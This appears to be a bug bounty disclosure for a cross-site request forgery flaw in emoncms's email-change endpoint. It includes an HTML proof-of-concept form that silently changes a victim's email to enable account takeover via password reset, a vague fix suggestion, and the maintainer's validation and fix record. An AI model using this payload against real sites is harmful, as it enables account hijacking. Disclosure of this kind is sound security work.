Improper Authorization in Handler for Custom URL Scheme in emoncms/emoncms

Valid

Reported on

Jul 15th 2021


✍️ Description

In CSRF attack if attacker able to change the victim email then attacker can change email to own email and get password from password reset section and then the account take over happen here.

🕵️‍♂️ Proof of Concept

1.you login in your account 2.you make a file contain the following html file. 3.client should open html ( as victim site) 4.Email going to be changed after click the "Submit request"

// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://emoncms.org/user/changeemail.json">
      <input type="hidden" name="email" value="victim&#64;mail&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

the attacker can take full control of victim account

Fix

you can set cookies on a custom header. this is a fastest way that you can protect your users

Occurrences

We have contacted a member of the emoncms team and are waiting to hear back a year ago
emoncms/emoncms maintainer
a year ago

Thanks again!

emoncms/emoncms maintainer validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
emoncms/emoncms maintainer confirmed that a fix has been merged on ca1f5c a year ago
The fix bounty has been dropped
to join this conversation